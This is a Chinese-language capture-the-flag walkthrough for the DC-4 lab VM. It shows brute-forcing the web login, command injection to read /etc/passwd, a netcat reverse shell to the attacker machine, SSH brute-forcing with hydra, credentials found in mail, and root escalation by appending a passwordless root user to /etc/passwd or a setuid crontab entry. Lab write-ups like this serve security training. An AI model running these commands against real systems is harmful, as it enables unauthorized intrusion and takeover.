01 项目安装

首先咱们需要将DC-4的靶机下载，并安装到咱们的靶机上

下载地址是：https://www.five86.com/dc-4.html

进入页面点击here 进行下载

下载好之后，导入咱们的虚拟机

看到这个页面，表示我们靶机安装成功，接下来就是拿下它

02 信息收集

首先我们进行信息收集，获取靶机的ip和相关端口

#获取ip地址
nmap 192.168.31.0/24

可以看到靶机开启了80端口，页面访问一下

可以访问成功,可以看到直接就让输入账户和密码

03 爆破账号密码

既然看到了登录密码框，而且提示，账户名为：admin，只需要就用BurpSuite将密码爆破出来

最后爆出 账号名: admin , 密码: happy

04 命令注入

进入网页之后可以看到，居然是可以执行linux命令

既然如此，用BurpSuite拦截下

可以看到页面确实在往后台传递命令，那么这里存在命令注入漏洞

将 ls+-l 修改为 cat+/etc/passwd ，获取下服务器密码

可以看到直接获取了服务器的用户名

将有用的提取出来

#服务器用户名
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

既然可以执行命令，那直接反弹shell

nc+192.168.31.81+1234+-e+/bin/bash

在kali上监听1234端口

攻击机上已经获取到了shell

#获取完全交互的shell
python -c 'import pty;pty.spawn("/bin/sh")'

链接上靶机之后，看下服务器上面都有什么，最后发现只有jim文件下有类似密码备份

在kali中创建个文件，将密码保存起来

#将密码放入文件，保存
vim pass.txt
:wq

在创建个文件，用来存储服务器的用户名

05 ssh爆破

既然有了用户名列表，也有了密码列表，那么就开始对服务器进行爆破

#在kali中使用hydra进行爆破
hydra -L user.txt -P pass.txt  ssh://192.168.31.145 -s  22

可以看到账号是: jim ,密码是: jibril04

使用ssh远程登录jim的账号

ssh [email protected]

登录成功

06 获取信息

在服务器中，可以看到Charles发送给Jim的一份邮件

在var/mail文件夹下

可以看到 Charles的密码是 ^xHhA&hvim0y

ssh链接一下

ssh [email protected]

登录成功

07 提权

执行

sudo -l

可以看到一个root权限无密码执行的脚本

可以通过这个脚本进行提权

这个脚本具体是做什么用的？它主要是把内容写入一个文件的中的末尾

既然知道脚本的功能，那么这个地方就有两种办法提取

第一种，创建一个具有root权限的用户

#创建新的root权限账户
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

第二种，定时任务

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

/bin/sh

提权成功

最后查看root目录下的目标

08 总结

1. 使用BurpSuite对网页登录框，进行密码账号爆破

2. 通过命令注入漏洞，进行命令注入

3. 使用hydra对ssh进行爆破

4. 通过现有的脚本进行提权操作

-END-

微信号：Zero-safety

-扫码关注我们-

带你领略不一样的世界